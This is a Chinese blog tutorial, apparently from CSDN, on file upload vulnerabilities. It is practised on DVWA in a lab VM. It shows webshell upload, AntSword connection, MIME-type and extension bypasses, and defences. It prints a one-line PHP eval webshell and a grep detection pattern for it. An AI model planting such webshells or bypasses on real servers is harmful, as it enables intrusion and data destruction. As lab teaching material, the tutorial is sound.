文件上传漏洞与防御

最新推荐文章于 2023-02-13 21:56:55 发布
最新推荐文章于 2023-02-13 21:56:55 发布
阅读量390 收藏 1
点赞数
文章标签: 安全 php 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45798017/article/details/105243611
版权

简介

文件上传中含有:文件文档,图片,视频等,然而,如果被允许上传了恶意文件如PHP,ASP等的绕过web应用并顺利执行,就相当与黑客拿到webshell,然后就可以拿到web数据进行删除,文件提权,进而整个服务器甚至是内网。

文件上传漏洞主要就是攻击web服务,而SQL注入主要是要拿到数据库,一旦两种渗透相结合,就可以达到对目标的深度控制。

Webshell的介绍

小马:一句话木马,整个shell代码只有一行,是系统执行的函数。
大马:代码量和功能比小马多,同时多了一层二次编码加密用于防止防火墙或入侵系统的检测。
通常来说就是调用一些函数,如:eval调用的是php函数,system调用的linux的命令。

实验

以下用到
火狐浏览器+xshell+VMware虚拟机+Owaspbwa靶机+AntSword中国蚁剑

Low级别的文件上传

首先我们在浏览器中通过靶机的IP地址打开靶机中的DVWA,其次,我们设置安全难度等级为low,然后,我们在upload漏洞中上传一份php的文件,然后显示上传成功,把php文件的地址复制到URL栏中的末尾,记得把#去掉
在这里插入图片描述
我的php文件是
在这里插入图片描述
然后,我们把URL栏中的所有复制下来在AntSword中添加数据打开
在这里插入图片描述
然后我们打开刚才的http,右键打开文件管理
在这里插入图片描述
打开后,显示如下页面,很显然,我们的php文件就在里面了
在这里插入图片描述
我们如果一直点“上层”的话,就可以看到这个靶机的所有数据文件了
在这里插入图片描述
在所选的文件右击就可以显示可以删除你想要删除的文件了。

如上,在low等级下的可以上传任意类型的文件,在DVWA的upload的页面veiw source下页面可以看出对文件上传没什么限制。
而我们也就可以通过中国蚁剑这样的软件把一段恶意的木马文件上传到网站中了。

Medium级别的上传漏洞

在这里,我们还用到了一个软件,Burpsuite
我们先通过xshell把之前dvwa中的php文件删除,操作如下:

cd /var/www/dvwa/hackable/uploads/  #从之前我们在中国蚁剑中的操作可以看出php上传的位置
ls  #ls可以查看uploads中拥有的文件
rm -rf *   #删除uploads中的文件,这是通过命令删除的,当然也可以通过蚁剑直接删除
ls    #再ls 就可以看出uploads中没有东西了

然后我们就可以进行文件上传了,先上传一张照片,可以上传的,再上传刚才那个php文件,上传不了,显然medium级别的有了一定的限制。

这是数据文件Mime类型决定的(就是在响应头会有Content-type),而Burpsuite就可以对上传的文件进行拦截修改再上传。

我们打开Burpsuite进行文件上传的拦截,浏览器页面加载不出来,然而Burpsuite抓到了上传的数据包,如下图所示,如果和我的页面不一样,我们点击上面的drop丢弃之前的拦截数据包,就可以显示下一个数据包了
在这里插入图片描述
因为medium级别的有了一定的限制,所以我们得修改文件Mine类型再上传数据包
在这里插入图片描述
如图显示,上传成功
在这里插入图片描述

High级别的上传漏洞

还是和刚才一样,通过xshell把uploads上传的文件删除
我们可以通过view source查看源码来了解high级别下的限制
在这里插入图片描述
在这里改动Mime类型就不行了,或许可以尝试在文件后缀添加.jpg,上传或许能成功,但这个木马文件有图像的后缀就不一定能用了。
在这里插入图片描述
然后,显示上传成功
在这里插入图片描述

如何防御上传文件漏洞

总结一下:

  1. 对文件的后缀进行检测
  2. 在前端布置web防火墙,检测上传的是否有eval($_POST[])这样的标记
  3. 通过xshell来检测上传的是什么文件,然后cat文件内容
root@owaspbwa:~# cd /var/www/dvwa/hackable/uploads/
root@owaspbwa:/var/www/dvwa/hackable/uploads# ls
shell.php
root@owaspbwa:/var/www/dvwa/hackable/uploads# cat shell.php
<?php @eval($_POST['antsword']);?>root@owaspbwa:/var/www/dvwa/hackable/uploads#
  1. 或者我们再不知道密码的情况下egrep过滤带有关键字的
root@owaspbwa:/var/www/dvwa/hackable/uploads# fgrep -R '@eval($_POST[' /var/www/dvwa        
/var/www/dvwa/hackable/uploads/shell.php:<?php @eval($_POST['antsword']);?>
#fgreg中的f是固定的意思,-R意思是递归,/var/www/dvwa是网站目录
#这样就可以知道shell文件目录地址和内容了
Sculptor-L
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全文件上传漏洞详解,文件上传漏洞原理、绕过方式和防御方案。
wangyuxiang946的博客
05-28 2610
结合实战靶场解析文件上传漏洞过滤及绕过方式,讲解文件上传原理和防御方式,
网络攻防入门---文件上传漏洞防御
濯君
12-27 820
一:下载相应的工具 VMware Kali linux2020.3下载与安装详细教程 OWASP Broken Web Apps渗透测试环境搭建和安装教程 中国菜刀下载 二:主要是使用靶机OWASP Broken Web Apps中的Damn Vulnerable Web App作为攻击目标,其中的upload存在文件上传漏洞 其中的DVWA Security可以设置安全等级,共有三个安全等级low,medium,high 三:low安全等级 此安全等级下的upload源码 <?php
文件上传漏洞渗透及防御
若面朝大海边竹妮春暖花开的博客
09-24 432
在我们访问网站时很多时候需要我们上传文件,如头像、PDF文档等 按照规定,需要我们上传图片的话我们会上传图片,需要我们上传文档我们会上传文档 如果网站没有对我们上传的文件信息做出检测,我们上传了一些代码。如PHP文件,我们可能就会获得一些WEB的权限 如果一个网站后台的文件上传检测安全级别很低,并不严禁,如下图的PHP源码,只是规定了上传到服务器的位置和上传的文件名,那我们就可以上传一个php一句话木马来获得webshell 以下代码时PHP的一句话木马,使用中国菜刀进行连接,单引号里的为密码 一个
文件上传漏洞的利用和防御
qq_61714717的博客
12-12 4303
文件上传漏洞的学习
文件上传漏洞-01】文件上传漏洞及其防御
cc
02-13 6403
文件上传是Web应用必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站等。如果服务器配置不当或者没有对上传的文件后缀类型进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件、exe程序等,这就造成了文件上传漏洞文件上传漏洞产生原因除了未对文件后缀进行严格的过滤外,还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护,如Apache、IIS等解析漏洞
文件上传漏洞防御
weixin_44926231的博客
08-13 3350
防范文件上传漏洞常见的几种方法: 1.文件上传的目录设置为不可执行 只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本文件,服务器本身也不会受到影响,因此这一点至关重要。 2.判断文件类型 在判断文件类型时,可以结合使用MIME Type、后缀检查等方式。在文件类型检查中,强烈推荐白名单方式,黑名单的方式已经无数次被证明是不可靠的。此外,对于图片的处理,可以使用压缩函数或者resize函...
计算机网络安全文件上传漏洞防御措施.pdf
09-19
计算机网络安全文件上传漏洞防御措施 计算机网络安全文件上传漏洞是一种常见的Web安全漏洞,攻击者可以通过上传恶意代码的文件来获取服务器的控制权。为了防御这种攻击,需要对文件上传进行严格的校验检测,...
文件上传漏洞的思维导图
04-19
文件上传漏洞是网络安全领域中的一个重要话题,主要涉及服务器上的文件管理与权限控制。攻击者通过这类漏洞能够上传恶意文件,从而可能对系统造成严重破坏,包括执行任意代码、获取敏感信息甚至完全控制服务器。以下...
WebShell文件上传漏洞分析溯源
02-22
为了防御WebShell 文件上传漏洞,需要采取以下措施: 1. 输入验证:对用户输入进行充分的验证,以防止恶意文件的上传。 2. 文件上传机制安全:确保文件上传机制的安全,例如限制上传文件的类型和大小。 3. 权限配置...
web网站文件上传漏洞和攻击-运维安全详细笔记
最新发布
06-30
三、文件上传漏洞防御方法 1. 验证用户上传的文件类型和内容,禁止上传恶意文件。 2. 使用文件类型白名单,仅允许上传指定类型的文件。 3. 对上传的文件进行病毒扫描和沙箱检测。 4. 限制用户上传文件的大小和数量...
文件上传漏洞训练平台.zip
10-14
10. **利用与防御实战**:通过实战模拟,学习如何检测、利用和修复实际环境中的文件上传漏洞。 在每个关卡中,你可能会遇到不同的挑战,通过解谜和实践,加深对文件上传漏洞原理和防范手段的理解。完成训练后,你...
Web安全漏洞介绍及防御-文件上传漏洞
java后端开发的博客,不仅仅是后端开发
07-11 5104
文件上传是web应用中的常见功能,它是如何成为漏洞的?如何防御这种漏洞呢,请看本文白话介绍
文件上传漏洞攻击与防范方法
热门推荐
m0_38103658的博客
08-30 4万+
文件上传漏洞攻击与防范方法 文件上传漏洞简介: 文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞文件上传漏洞危害: 上传漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者上传...
文件上传漏洞原理、防御、绕过
qq_43455259的博客
05-31 4198
文件上传漏洞原理 文件上传漏洞防御 文件上传漏洞防护绕过
攻防:文件上传漏洞的攻击与防御
玫瑰安全
05-18 1699
一、 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传漏洞本身就是一个危害巨大的漏洞,WebShell更是将这种漏洞的利用无限扩大。大多数的上传漏洞被利用后攻击者都会留下
上传漏洞防御
Wang的专栏
06-18 1114
如上面的代码,如果上传文件路径和url是对应的,那么就会被执行这些代码 在这里我们没有指定相关路由,php自动解析路径url, 所以这个漏洞php中相当严重 上传漏洞演示 此处我们使用nodejs做演示 前端程序 后端程序,我们首先要安装下支持form-data的body解析模块 $ ,之后在合适的地方引入 引入 配置 添加上传路由 后端接收上传程序 后端处理上传路径逻辑 好的,程序到此为止,如果我们正常上传图片,它会正常展示, 如果我们上传的是.js文件,它就会尝试运行.js文件,
文件上传漏洞原理与防御
todd_qwe的博客
04-30 1143
目录原理及危害分类及常用工具用法防御思路 原理及危害 文件上传是大部分web应用都具备的功能,例如用户上传附件,修改头像,分享图片/视频等,web应用收集之后后台存储,需要的时候再调用出来。如果恶意文件如PHP,ASP等执行文件绕过web应用,并顺利执行,相当于黑客直接拿到了webshell,就可以拿到web应用的数据,对文件系统删除,增加,修改,甚至本地提权,进一步拿下整个服务器甚至内网渗透。文...
网络攻击与防御文件上传漏洞
代登辉的博客
04-12 386
一、文件上传漏洞 1.1 概述 ​ 文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 1.2 ...
文件上传漏洞防范措施
Ethan024的博客
04-13 2765
不要在前端使用JS实施上传限制策略; 通过服务端对上传文件进行限制: (1)进行多条件组合检查:比如文件大小,路径,扩展名,文件类型,完整性; (2)对上传的文件在服务器上存储时进行重命名(执行合理的命名规则); (3)对服务器端上传文件的目录进行权限控制(比如只读),限制执行权限带来的危害; ...
文件上传漏洞防御研究的意义
05-12
文件上传漏洞是指攻击者通过上传恶意文件或代码来绕过应用程序的安全机制,从而实现对应用程序的攻击或者对服务器进行入侵。因此,对文件上传漏洞的研究和防御具有重要的意义。 首先,文件上传漏洞是网络攻击中的常见漏洞之一,攻击者可以通过上传恶意文件或代码来实现对应用程序的攻击或者对服务器进行入侵。因此,研究和防御文件上传漏洞可以有效地提高应用程序和服务器的安全性。 其次,文件上传漏洞防御是现代网络安全的重要组成部分,防御文件上传漏洞可以帮助企业、组织和个人提高网络安全意识和能力,从而保护自身信息安全和网络安全。 最后,文件上传漏洞的研究和防御也是网络安全技术不断发展的重要方向之一,随着网络攻击的不断增加和漏洞的不断出现,文件上传漏洞的研究和防御将成为网络安全领域的重要研究方向之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值